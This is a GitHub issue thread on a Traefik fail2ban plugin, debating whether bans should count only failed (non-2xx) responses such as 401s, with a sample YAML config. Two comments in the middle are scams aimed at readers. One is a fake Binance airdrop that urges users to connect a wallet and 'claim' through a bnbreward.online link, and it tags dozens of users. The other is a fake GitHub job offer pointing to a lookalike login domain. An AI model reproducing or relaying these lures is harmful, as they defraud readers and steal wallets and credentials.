### ISSUE TITLE
Only ban if the response is non 2##?

### ISSUE THREAD

**Issue by AnderssonPeter** [tomMoulard/fail2ban#69]
Wouldn't it make more sense if the ban would trigger based on all requests that aren't http 200-299?

Then we could set a much lower limit and thus lowering the number of attempts a hacker has before banning them.

(If i read the code correctly it just count's the number of requests)

**Comment by AnderssonPeter** [comment]
After looking at the API it doesn't look like this is possible right now.

**Comment by tomMoulard** [comment]
I don't think that this plugin should differentiate its behavior between status codes.
The goal of this plugin is to intercept bad requests coming, as bad requests could be 2XX status codes, filtering them out of the f2b algorithm may be problematic.

**Comment by AnderssonPeter** [comment]
From what I can se its not possible with the current middleware api?
But I still think that it's more logical to block requests that cause a lot of 401 and 403 or at least being able to set a lower limit when it comes to those 2 (But as its not possible in the current API its fine with me if you close this)

**Comment by ImranR98** [comment]
I think this would be useful, that way we can block attempts to brute-force login screens (like basic auth) without accidentally banning legitimate (but frequent) requests.

**Comment by AnderssonPeter** [comment]
I'll think this can actually be done, can't remember what plugin did it but there is some way to intercept the response before it's sent to the client.

That would allow the plugin to read the http status code.

**Comment by tomMoulard** [comment]
The issue is not on whether this **could** be done, it is whether this **should** be done.

Following @ImranR98 message,
> I think this would be useful, that way we can block attempts to brute-force login screens (like basic auth) without accidentally banning legitimate (but frequent) requests.

An over-engineered plugin could do the F2B mechanism with different settings on different status code. This would lead to a config looking like this:

```yaml
apiVersion: traefik.containo.us/v1alpha1
kind: Middleware
metadata:
  name: my-fail2ban
  namespace: my-namespace
spec:
  plugin:
    fail2ban:
      rules:
        - statusCode: 400-500
          fail2ban:
            # f2b config here
            ... 
```

But This would require a huge breaking change in the configuration.

A first step in this direction could be to have this plugin work only on a specified status code range, and have multiple instances of this plugin with multiple configuration for all the use cases.

This means that we could add a `statusCode` config that when filled would filter the use of this plugin.

WDYT ?

**Comment by AnderssonPeter** [comment]
While I'm clearly biased for this change as I created the issue I think this would be great.
But like you said I don't see any way to do this without causing a breaking change :(, but as long as you increase the major version number I don't see this as a issue.

**Comment by exhuma** [comment]
I discovered this plugin only recently. In the past I have already used the original fail2ban service on Linux machines. That service only consideres _failures_ for the detection (bad login attempts e.t.c.). Hence the name "fail2ban" (too many failures lead to a ban). It's in their first line of the README:

> Fail2Ban scans log files like /var/log/auth.log and bans IP addresses conducting too many failed login attempts.

The current name of the plugin is a misleading as it also includes _successful_ requests.

It is likely unfeasible to implement the full configurability of the original fail2ban into this plugin (due to the complexity). But I would fully expect this traefik middleware to only consider failed requests for banning requests.

It is perfectly legitimate for an authenticated client to an API behind traefik to execute hundreds of requests per minute (without being banned). But if you see, let's say, 50 requests leading to a 401 or 404 from the same IP within even 10 minutes, something is fishy and should trigger a block.

I would be more careful about 403 responses though. They may still be legitimate.

I really think that this is a legitimate request, even if it breaks the config. It would make the plugin a lot more usable. I'm currently forced to increase the find-time and max-retries so much that I'm afraid that malicious requests fall through the net.

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @ssempervirens, @lanfengc, @rozsival, @ultimateprogramer, @programmer-ke, @2foil, @neilsagarwal, @kburtram, @danigomez, @Majeshonor, @DeRain, @darkfriday, @riload35, @HugoNotHere, @btjk, @mtree, @alihalabyah, @chaoannricardo, @zachhhhh, @alexwolfe19, @Aakash2705, @AveryMainstone, @msaadawi, @MetaNova, @NeonKapawn, @sonnienguyen, @FenixTags, @blog2020, @STeffaine, @oded11, @serpro69, @eduardoteles17, @danielsfo1981, @najialshabwani, @AntoineKM, @justgostin, @Cryptonewsmedia, @shahrokhniakan, @bitalchemist, @klarkc, @mertturkmenoglu, @AliMD, @aureleoules, @laurentiuonac, @likegogogo, @nihalxkumar, @jhole89, @dannysofftie, @GoodM4ven, @Parasrah

**Comment by wintful** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
darrylyeo, @GrandGarcon, @rekmarks, @Faustino-CIMA, @nitinongit, @felixoldenburg, @TheLearneer, @mitohund, @anfederico, @Kishoraditya, @prakx1, @jensb89, @JohnMichaelTO, @Okemwag, @dufour-yohann, @jayadatta, @HorizonLiang, @kopelli, @joshfuggle, @taishi8117

**Comment by AnderssonPeter** [comment]
I'm not 100% sure but https://github.com/safing/scanblock/tree/master seems to do what we need, but sadly it lacks any options to only bock certain types of requests, currently it counts all 4XX.

**Comment by dberardo-com** [comment]
i am definitely upvoting this. fail2ban is used in very different applications and it usually checks log files, as well as status code, etc. so this is definitely something the user would expect. 

otherwise this would end up being only a rate-limiting plugin, wouldnt it ? 
like: https://plugins.traefik.io/plugins/63993c3dba1f6c0a1e5bfb88/rate-limit
